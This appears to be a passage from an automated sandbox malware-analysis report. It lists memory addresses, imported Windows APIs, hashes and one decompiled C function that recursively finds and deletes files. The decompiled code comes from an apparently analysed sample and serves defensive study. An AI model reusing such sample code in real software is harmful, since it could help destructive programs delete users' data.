                                                                                                                                                                          0x72e4215e
                                                                                                                                                                          0x72e4215e
                                                                                                                                                                          0x72e42162
                                                                                                                                                                          0x72e4217a
                                                                                                                                                                          0x72e4217d
                                                                                                                                                                          0x72e42181
                                                                                                                                                                          0x72e42187
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42187
                                                                                                                                                                          0x72e42164
                                                                                                                                                                          0x72e42164
                                                                                                                                                                          0x72e42167
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42169
                                                                                                                                                                          0x72e4216c
                                                                                                                                                                          0x72e4216e
                                                                                                                                                                          0x72e4216f
                                                                                                                                                                          0x72e4216f
                                                                                                                                                                          0x72e4216f
                                                                                                                                                                          0x72e42170
                                                                                                                                                                          0x72e42173
                                                                                                                                                                          0x72e42176
                                                                                                                                                                          0x72e42177
                                                                                                                                                                          0x72e42151
                                                                                                                                                                          0x72e42152
                                                                                                                                                                          0x72e42153
                                                                                                                                                                          0x72e42156
                                                                                                                                                                          0x72e42159
                                                                                                                                                                          0x72e4215c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4215c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41fa7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41fb3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f9a
                                                                                                                                                                          0x72e41f9e
                                                                                                                                                                          0x72e41fa2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4211c
                                                                                                                                                                          0x72e42120
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42126
                                                                                                                                                                          0x72e4212f
                                                                                                                                                                          0x72e42136
                                                                                                                                                                          0x72e4213e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42083
                                                                                                                                                                          0x72e42083
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41fbc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e421a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4208b
                                                                                                                                                                          0x72e4208d
                                                                                                                                                                          0x72e4208d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42196
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4219a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e421a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420d3
                                                                                                                                                                          0x72e420d5
                                                                                                                                                                          0x72e420d5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4209d
                                                                                                                                                                          0x72e4209f
                                                                                                                                                                          0x72e4209f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420af
                                                                                                                                                                          0x72e420b1
                                                                                                                                                                          0x72e420b1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420e1
                                                                                                                                                                          0x72e420e3
                                                                                                                                                                          0x72e420e3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420ba
                                                                                                                                                                          0x72e420bc
                                                                                                                                                                          0x72e420bc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420c1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4219e
                                                                                                                                                                          0x72e421a8
                                                                                                                                                                          0x72e421a8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420ec
                                                                                                                                                                          0x72e420f0
                                                                                                                                                                          0x72e420f5
                                                                                                                                                                          0x72e420f8
                                                                                                                                                                          0x72e420f9
                                                                                                                                                                          0x72e420fc
                                                                                                                                                                          0x72e42102
                                                                                                                                                                          0x72e42102
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4218e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420c5
                                                                                                                                                                          0x72e420c7
                                                                                                                                                                          0x72e420c7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41fc3
                                                                                                                                                                          0x72e41fc3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420da
                                                                                                                                                                          0x72e420dc
                                                                                                                                                                          0x72e420dc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f67
                                                                                                                                                                          0x72e41f6d
                                                                                                                                                                          0x72e41f70
                                                                                                                                                                          0x72e41f72
                                                                                                                                                                          0x72e41f72
                                                                                                                                                                          0x72e41f75
                                                                                                                                                                          0x72e41f79
                                                                                                                                                                          0x72e41f86
                                                                                                                                                                          0x72e41f88
                                                                                                                                                                          0x72e41f8e
                                                                                                                                                                          0x72e41f8e
                                                                                                                                                                          0x72e41f8e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4208e
                                                                                                                                                                          0x72e4208e
                                                                                                                                                                          0x72e42090
                                                                                                                                                                          0x72e42097
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420d6
                                                                                                                                                                          0x72e420d6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420a0
                                                                                                                                                                          0x72e420a0
                                                                                                                                                                          0x72e420a2
                                                                                                                                                                          0x72e420a9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420b2
                                                                                                                                                                          0x72e420b2
                                                                                                                                                                          0x72e420b4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420e4
                                                                                                                                                                          0x72e420e4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420bd
                                                                                                                                                                          0x72e420bd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4210a
                                                                                                                                                                          0x72e4210e
                                                                                                                                                                          0x72e42113
                                                                                                                                                                          0x72e42116
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420c8
                                                                                                                                                                          0x72e420c8
                                                                                                                                                                          0x72e420cb
                                                                                                                                                                          0x72e420cd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e420dd
                                                                                                                                                                          0x72e420dd
                                                                                                                                                                          0x72e420e6
                                                                                                                                                                          0x72e420e6
                                                                                                                                                                          0x72e41fc5
                                                                                                                                                                          0x72e41fc5
                                                                                                                                                                          0x72e41fc8
                                                                                                                                                                          0x72e41fcf
                                                                                                                                                                          0x72e41fd1
                                                                                                                                                                          0x72e41fd3
                                                                                                                                                                          0x72e41fda
                                                                                                                                                                          0x72e41fdd
                                                                                                                                                                          0x72e41fe2
                                                                                                                                                                          0x72e41fe4
                                                                                                                                                                          0x72e41fe6
                                                                                                                                                                          0x72e41fea
                                                                                                                                                                          0x72e41ff0
                                                                                                                                                                          0x72e41ff6
                                                                                                                                                                          0x72e41ff6
                                                                                                                                                                          0x72e41ff8
                                                                                                                                                                          0x72e41ff8
                                                                                                                                                                          0x72e41ff9
                                                                                                                                                                          0x72e41ff9
                                                                                                                                                                          0x72e41ffd
                                                                                                                                                                          0x72e42003
                                                                                                                                                                          0x72e42005
                                                                                                                                                                          0x72e42009
                                                                                                                                                                          0x72e4200e
                                                                                                                                                                          0x72e4200e
                                                                                                                                                                          0x72e42010
                                                                                                                                                                          0x72e42010
                                                                                                                                                                          0x72e42013
                                                                                                                                                                          0x72e42016
                                                                                                                                                                          0x72e4201f
                                                                                                                                                                          0x72e42025
                                                                                                                                                                          0x72e42028
                                                                                                                                                                          0x72e42028
                                                                                                                                                                          0x72e4202a
                                                                                                                                                                          0x72e4202d
                                                                                                                                                                          0x72e42033
                                                                                                                                                                          0x72e42039
                                                                                                                                                                          0x72e42039
                                                                                                                                                                          0x72e4203b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42041
                                                                                                                                                                          0x72e42041
                                                                                                                                                                          0x72e42045
                                                                                                                                                                          0x72e4204c
                                                                                                                                                                          0x72e42070
                                                                                                                                                                          0x72e42070
                                                                                                                                                                          0x72e42074
                                                                                                                                                                          0x72e42076
                                                                                                                                                                          0x72e42079
                                                                                                                                                                          0x72e42079
                                                                                                                                                                          0x72e4207c
                                                                                                                                                                          0x72e4207c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42074
                                                                                                                                                                          0x72e42051
                                                                                                                                                                          0x72e42054
                                                                                                                                                                          0x72e42054
                                                                                                                                                                          0x72e4205b
                                                                                                                                                                          0x72e4205d
                                                                                                                                                                          0x72e42060
                                                                                                                                                                          0x72e42067
                                                                                                                                                                          0x72e42068
                                                                                                                                                                          0x72e4206e
                                                                                                                                                                          0x72e4206e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4206e
                                                                                                                                                                          0x72e42062
                                                                                                                                                                          0x72e42065
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42065
                                                                                                                                                                          0x72e41ff2
                                                                                                                                                                          0x72e41ff4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f60
                                                                                                                                                                          0x72e41e05
                                                                                                                                                                          0x72e41e05
                                                                                                                                                                          0x72e41e06
                                                                                                                                                                          0x72e41f46
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f46
                                                                                                                                                                          0x72e41e0c
                                                                                                                                                                          0x72e41e0d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41e13
                                                                                                                                                                          0x72e41e16
                                                                                                                                                                          0x72e41f0b
                                                                                                                                                                          0x72e41f0b
                                                                                                                                                                          0x72e41f0e
                                                                                                                                                                          0x72e41f23
                                                                                                                                                                          0x72e41f25
                                                                                                                                                                          0x72e41f25
                                                                                                                                                                          0x72e41f26
                                                                                                                                                                          0x72e41f29
                                                                                                                                                                          0x72e41f2c
                                                                                                                                                                          0x72e41f38
                                                                                                                                                                          0x72e41f38
                                                                                                                                                                          0x72e41f38
                                                                                                                                                                          0x72e41f2e
                                                                                                                                                                          0x72e41f2e
                                                                                                                                                                          0x72e41f2e
                                                                                                                                                                          0x72e41f3e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f3e
                                                                                                                                                                          0x72e41f10
                                                                                                                                                                          0x72e41f10
                                                                                                                                                                          0x72e41f11
                                                                                                                                                                          0x72e41f1f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f1f
                                                                                                                                                                          0x72e41f14
                                                                                                                                                                          0x72e41f15
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f1b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f1b
                                                                                                                                                                          0x72e41e1c
                                                                                                                                                                          0x72e41f07
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f07
                                                                                                                                                                          0x72e41e22
                                                                                                                                                                          0x72e41e22
                                                                                                                                                                          0x72e41e25
                                                                                                                                                                          0x72e41e4e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41e4e
                                                                                                                                                                          0x72e41e27
                                                                                                                                                                          0x72e41e27
                                                                                                                                                                          0x72e41e2a
                                                                                                                                                                          0x72e41e44
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41e44
                                                                                                                                                                          0x72e41e2c
                                                                                                                                                                          0x72e41e2c
                                                                                                                                                                          0x72e41e2f
                                                                                                                                                                          0x72e41e3e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41e3e
                                                                                                                                                                          0x72e41e32
                                                                                                                                                                          0x72e41e33
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41e35
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41cec
                                                                                                                                                                          0x72e41cec
                                                                                                                                                                          0x72e41cef
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41cef
                                                                                                                                                                          0x72e41ce6
                                                                                                                                                                          0x72e41cd3
                                                                                                                                                                          0x72e41cd8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41cda
                                                                                                                                                                          0x72e41cdd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41cdd
                                                                                                                                                                          0x72e41c6d
                                                                                                                                                                          0x72e41c70
                                                                                                                                                                          0x72e41ca6
                                                                                                                                                                          0x72e41ca9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41caf
                                                                                                                                                                          0x72e41cb1
                                                                                                                                                                          0x72e41cb5
                                                                                                                                                                          0x72e41cbc
                                                                                                                                                                          0x72e41cc3
                                                                                                                                                                          0x72e41cc6
                                                                                                                                                                          0x72e41cc9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41cc9
                                                                                                                                                                          0x72e41ca9
                                                                                                                                                                          0x72e41c72
                                                                                                                                                                          0x72e41c73
                                                                                                                                                                          0x72e41c8e
                                                                                                                                                                          0x72e41c91
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41c97
                                                                                                                                                                          0x72e41c97
                                                                                                                                                                          0x72e41c9e
                                                                                                                                                                          0x72e41ca1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41ca1
                                                                                                                                                                          0x72e41c91
                                                                                                                                                                          0x72e41c78
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41c7e
                                                                                                                                                                          0x72e41c7e
                                                                                                                                                                          0x72e41c85
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41c85
                                                                                                                                                                          0x72e41c78
                                                                                                                                                                          0x72e41e74
                                                                                                                                                                          0x72e41e79
                                                                                                                                                                          0x72e41e7e
                                                                                                                                                                          0x72e41e82
                                                                                                                                                                          0x72e42355
                                                                                                                                                                          0x72e4235b
                                                                                                                                                                          0x72e41e94
                                                                                                                                                                          0x72e41e96
                                                                                                                                                                          0x72e41e97
                                                                                                                                                                          0x72e4227e
                                                                                                                                                                          0x72e4227e
                                                                                                                                                                          0x72e42281
                                                                                                                                                                          0x72e42284
                                                                                                                                                                          0x72e422a1
                                                                                                                                                                          0x72e422a7
                                                                                                                                                                          0x72e422a9
                                                                                                                                                                          0x72e422af
                                                                                                                                                                          0x72e422c6
                                                                                                                                                                          0x72e422c6
                                                                                                                                                                          0x72e422c6
                                                                                                                                                                          0x72e422d3
                                                                                                                                                                          0x72e422d9
                                                                                                                                                                          0x72e422dc
                                                                                                                                                                          0x72e422e2
                                                                                                                                                                          0x72e422e4
                                                                                                                                                                          0x72e422e8
                                                                                                                                                                          0x72e422ea
                                                                                                                                                                          0x72e422f1
                                                                                                                                                                          0x72e422f6
                                                                                                                                                                          0x72e422f9
                                                                                                                                                                          0x72e422fb
                                                                                                                                                                          0x72e42300
                                                                                                                                                                          0x72e42312
                                                                                                                                                                          0x72e42312
                                                                                                                                                                          0x72e42300
                                                                                                                                                                          0x72e422f9
                                                                                                                                                                          0x72e422e8
                                                                                                                                                                          0x72e42318
                                                                                                                                                                          0x72e4231b
                                                                                                                                                                          0x72e42325
                                                                                                                                                                          0x72e4232d
                                                                                                                                                                          0x72e4233a
                                                                                                                                                                          0x72e42340
                                                                                                                                                                          0x72e42343
                                                                                                                                                                          0x72e42273
                                                                                                                                                                          0x72e42273
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42273
                                                                                                                                                                          0x72e42349
                                                                                                                                                                          0x72e4234f
                                                                                                                                                                          0x72e4234f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42351
                                                                                                                                                                          0x72e42351
                                                                                                                                                                          0x72e42351
                                                                                                                                                                          0x72e42351
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4231d
                                                                                                                                                                          0x72e4231d
                                                                                                                                                                          0x72e42323
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42323
                                                                                                                                                                          0x72e4231b
                                                                                                                                                                          0x72e422b2
                                                                                                                                                                          0x72e422b8
                                                                                                                                                                          0x72e422ba
                                                                                                                                                                          0x72e422c0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e422c0
                                                                                                                                                                          0x72e42286
                                                                                                                                                                          0x72e4228d
                                                                                                                                                                          0x72e42293
                                                                                                                                                                          0x72e42299
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42299
                                                                                                                                                                          0x72e41e9d
                                                                                                                                                                          0x72e41e9e
                                                                                                                                                                          0x72e4225d
                                                                                                                                                                          0x72e4225d
                                                                                                                                                                          0x72e42263
                                                                                                                                                                          0x72e42266
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4226d
                                                                                                                                                                          0x72e42272
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42272
                                                                                                                                                                          0x72e41ea5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41eab
                                                                                                                                                                          0x72e41eab
                                                                                                                                                                          0x72e41eb4
                                                                                                                                                                          0x72e41eb9
                                                                                                                                                                          0x72e41ebf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41ec5
                                                                                                                                                                          0x72e41ed2
                                                                                                                                                                          0x72e41ed8
                                                                                                                                                                          0x72e41ee2
                                                                                                                                                                          0x72e41ee8
                                                                                                                                                                          0x72e41ef0
                                                                                                                                                                          0x72e41f00
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41f00

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 72E412BB: GlobalAlloc.KERNEL32(00000040,?,72E412DB,?,72E4137F,00000019,72E411CA,-000000A0), ref: 72E412C5
                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 72E41D2D
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 72E41D75
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 72E41D7F
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E41D92
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E41E74
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E41E79
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E41E7E
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E42068
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 72E42222
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 72E422A1
                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000008), ref: 72E422B2
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 72E4230C
                                                                                                                                                                          • lstrlenW.KERNEL32(00000808), ref: 72E42326
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                          • String ID: Nt@ht
                                                                                                                                                                          • API String ID: 245916457-2189037465
                                                                                                                                                                          • Opcode ID: 09ea8a0f062138866b527639f8a059c36727b7e4a7131ead53a0d10d02d8cc04
                                                                                                                                                                          • Instruction ID: f8e0db0f02deaa8b2a90c21336bceef9f3473596760f0322cb3011b8959d2bfa
                                                                                                                                                                          • Opcode Fuzzy Hash: 09ea8a0f062138866b527639f8a059c36727b7e4a7131ead53a0d10d02d8cc04
                                                                                                                                                                          • Instruction Fuzzy Hash: 05228C75D04206DBCF118FA9E5807EDBBF5FB04309F20E52EF166AA284DB706682CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405C49, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                          			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                                                                                                          0x00405c53
                                                                                                                                                                          0x00405c58
                                                                                                                                                                          0x00405c61
                                                                                                                                                                          0x00405c64
                                                                                                                                                                          0x00405c6c
                                                                                                                                                                          0x00405c6f
                                                                                                                                                                          0x00405c72
                                                                                                                                                                          0x00405c7a
                                                                                                                                                                          0x00405c7c
                                                                                                                                                                          0x00405c7d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405c7d
                                                                                                                                                                          0x00405c88
                                                                                                                                                                          0x00405c8b
                                                                                                                                                                          0x00405c8b
                                                                                                                                                                          0x00405c8b
                                                                                                                                                                          0x00405c8f
                                                                                                                                                                          0x00405ca2
                                                                                                                                                                          0x00405ca9
                                                                                                                                                                          0x00405cae
                                                                                                                                                                          0x00405cb2
                                                                                                                                                                          0x00405cc2
                                                                                                                                                                          0x00405cb4
                                                                                                                                                                          0x00405cba
                                                                                                                                                                          0x00405cba
                                                                                                                                                                          0x00405cc7
                                                                                                                                                                          0x00405ccb
                                                                                                                                                                          0x00405cd7
                                                                                                                                                                          0x00405cdd
                                                                                                                                                                          0x00405ce2
                                                                                                                                                                          0x00405ce8
                                                                                                                                                                          0x00405cf3
                                                                                                                                                                          0x00405cf9
                                                                                                                                                                          0x00405cfb
                                                                                                                                                                          0x00405cfe
                                                                                                                                                                          0x00405da8
                                                                                                                                                                          0x00405da8
                                                                                                                                                                          0x00405dac
                                                                                                                                                                          0x00405dae
                                                                                                                                                                          0x00405dae
                                                                                                                                                                          0x00405dae
                                                                                                                                                                          0x00405dae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405d04
                                                                                                                                                                          0x00405d04
                                                                                                                                                                          0x00405d04
                                                                                                                                                                          0x00405d0c
                                                                                                                                                                          0x00405d2c
                                                                                                                                                                          0x00405d34
                                                                                                                                                                          0x00405d39
                                                                                                                                                                          0x00405d40
                                                                                                                                                                          0x00405d5b
                                                                                                                                                                          0x00405d60
                                                                                                                                                                          0x00405d62
                                                                                                                                                                          0x00405d86
                                                                                                                                                                          0x00405d64
                                                                                                                                                                          0x00405d64
                                                                                                                                                                          0x00405d67
                                                                                                                                                                          0x00405d7b
                                                                                                                                                                          0x00405d69
                                                                                                                                                                          0x00405d6c
                                                                                                                                                                          0x00405d74
                                                                                                                                                                          0x00405d74
                                                                                                                                                                          0x00405d67
                                                                                                                                                                          0x00405d42
                                                                                                                                                                          0x00405d48
                                                                                                                                                                          0x00405d4a
                                                                                                                                                                          0x00405d50
                                                                                                                                                                          0x00405d50
                                                                                                                                                                          0x00405d4a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405d40
                                                                                                                                                                          0x00405d0e
                                                                                                                                                                          0x00405d16
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405d18
                                                                                                                                                                          0x00405d20
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405d22
                                                                                                                                                                          0x00405d2a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405d8b
                                                                                                                                                                          0x00405d93
                                                                                                                                                                          0x00405d99
                                                                                                                                                                          0x00405d99
                                                                                                                                                                          0x00405da2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405da2
                                                                                                                                                                          0x00405ccd
                                                                                                                                                                          0x00405cd5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405c91
                                                                                                                                                                          0x00405c91
                                                                                                                                                                          0x00405c93
                                                                                                                                                                          0x00405db3
                                                                                                                                                                          0x00405db5
                                                                                                                                                                          0x00405db8
                                                                                                                                                                          0x00405e09
                                                                                                                                                                          0x00405e09
                                                                                                                                                                          0x00405e09
                                                                                                                                                                          0x00405dba
                                                                                                                                                                          0x00405dbd
                                                                                                                                                                          0x00405dc8
                                                                                                                                                                          0x00405dcd
                                                                                                                                                                          0x00405dcf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405dd2
                                                                                                                                                                          0x00405dde
                                                                                                                                                                          0x00405de3
                                                                                                                                                                          0x00405de5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405e00
